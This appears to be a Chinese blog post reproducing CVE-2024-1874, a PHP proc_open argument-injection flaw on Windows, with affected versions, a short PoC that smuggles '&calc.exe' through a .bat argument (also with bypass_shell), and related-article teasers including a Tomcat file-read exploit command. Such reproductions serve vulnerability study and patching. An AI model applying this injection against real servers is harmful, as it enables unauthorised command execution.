PHP命令执行漏洞CVE-2024-1874复现

最新推荐文章于 2024-05-05 16:05:21 发布

A1andNS

最新推荐文章于 2024-05-05 16:05:21 发布

阅读量595

点赞数 3

文章标签： php 开发语言

本文链接：https://blog.csdn.net/qq_26139045/article/details/137887141

版权

本文介绍了PHP8.2.9及更低版本中的CVE-2024-1874漏洞，允许攻击者通过proc_open函数执行恶意代码，包括调用外部程序如计算器，即使设置了bypass_shell选项。文章详细展示了漏洞利用方法和可能的修复措施。

摘要由CSDN通过智能技术生成

CVE-2024-1874 PHP命令执行漏洞

影响版本

Affected versions
< 8.1.28
< 8.2.18
< 8.3.5
Patched versions
8.1.28
8.2.18
8.3.6

POC

创建一个文件test.php


<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes);
proc_close($proc);

随便创建一个.bat文件，如test.bat

echo test

然后在PHP 8.2.9nts版本下使用php test.php来执行test.php，成功RCE调起计算器。
在这里插入图片描述
即使在proc_open()函数中使用bypass shell选项，依旧RCE成功。

<?php
$descriptorspec = [STDIN, STDOUT, STDOUT];
$proc = proc_open(["test.bat", "\"&calc.exe"], $descriptorspec, $pipes, null, null, array("bypass_shell" => true));
proc_close($proc);

在这里插入图片描述

参考链接

https://mp.weixin.qq.com/s/jAeRY-XOKw8fmUDXT2ESNQ

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

A1andNS

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
PHP命令执行漏洞CVE-2024-1874复现

CVE-2024-1874漏洞复现
复制链接

扫一扫

蓝网科技临床浏览系统 deleteStudy SQL注入漏洞复现(CVE-2024-4257)

0xSec

04-29

986

蓝网科技临床浏览系统 deleteStudy接口处SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。

4大典型安全漏洞是怎么来的？如何解决？

simplilearnCN的博客

03-16

6526

关于防御网络攻击，最好的防御就是强有力的出击。首先，必须使用适当的工具和流程（如漏洞扫描程序和威胁检测技术）来识别潜在的漏洞和威胁。确定漏洞和威胁后，分析确定它们的优先级，按重要性顺序消除或减轻它们。

1 条评论您还未登录，请先登录后发表或查看评论

ThinkPHP漏洞合集（专注渗透视角）

LainWith的博客

04-11

7263

服务框架是指某领域一类服务的可复用设计与不完整的实现，与软件框架不同的是，服务框架同时体现着面向服务，一个服务框架可以分为两个主要部分：服务引擎、引入的外部服务。ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据，渐渐成为单位公共安全中最具有战略性的资产，框架的安全稳定运行也直接决定着业务系统能否正常使用。

ThinkPHP6 任意文件操作漏洞分析

bylfsj的博客

02-15

2502

公众号：https://mp.weixin.qq.com/s/UPu6cE20l24T6fkYOlSUJw 漏洞介绍 2020年1月10日，ThinkPHP团队发布一个补丁更新，修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件，在特定情况下还可以getshell。具体受影响版本为ThinkPHP6.0....

【CVE复现计划】CVE-2024-0195

m0_63138919的博客

04-05

1106

本文以春秋云镜为靶场，进行该CVE-2024-0195的漏洞原理学习，记录自己学习过程，还请大佬们师傅们指出文中错误

用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)

qq_39894062的博客

04-20

622

WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf

09-27

【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题，涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入，但因为`WP_Query`经常被WordPress插件广泛使用，所以其潜在的危害...

wLHK-Dedecms漏洞整理.pdf

09-20

wLHK-Dedecms漏洞整理从给定的文件信息中，...Dedecms漏洞整理报告中包含了多个漏洞，包括SQL注入漏洞、XSS漏洞等，这些漏洞可能会导致数据库中的数据泄露或修改，因此需要及时修复这些漏洞，以确保数据的安全性。

入侵防御漏洞复现(二)_cve-2024-16278 kali(3)，2024年最新2024年京东网络安全岗面试必问

2301_77110907的博客

04-16

985

CloudBees Jenkins是美国CloudBees公司的一款基于Java开发的开源的、可持续集成的自动化服务器，它主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。LTS（Long-Term Support）是CloudBees Jenkins的一个长期支持版本。CloudBees Jenkins 2.56及之前的版本和2.46.1 LTS及之前的版本中存在远程代码执行漏洞。

【漏洞复现】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767

失心少年

04-23

671

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！该平台ColdFusion 2023

【网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程（特详细）

2401_83946826的博客

04-16

1364

python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。

复现CVE-2024-2109 (Weblogic Server远程代码执行漏洞)(1)

2301_81327376的博客

04-08

437

🍅 硬核资料：关注即可领取PPT模板、简历模板、行业经典书籍PDF。🍅 技术互助：技术群大佬指点迷津，你的问题可能不是问题，求资源在群里喊一声。🍅 面试题库：由技术群里的小伙伴们共同投稿，热乎的大厂面试真题，持续更新中。🍅 知识体系：含编程语言、算法、大数据生态圈组件（Mysql、Hive、Spark、Flink）、数据仓库、Python、前端等等。一个人可以走的很快，但一群人才能走的更远。

福建科立讯通信指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621、CVE-2024-2622、CVE-2024-2566)

0xSec

03-22

916

福建科立讯通信指挥调度管理平台 down_file.php、pwd_update.php、editemedia.php、get_extension_yl.php、get_extension_yl.php等接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

GeoServer SQL 注入漏洞复现（CVE-2024-25157）附poc_geoserverl漏洞

2401_83974660的博客

04-13

947

这个方向初期比较容易入门一些，掌握一些基本技术，拿起各种现成的工具就可以开黑了。

WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交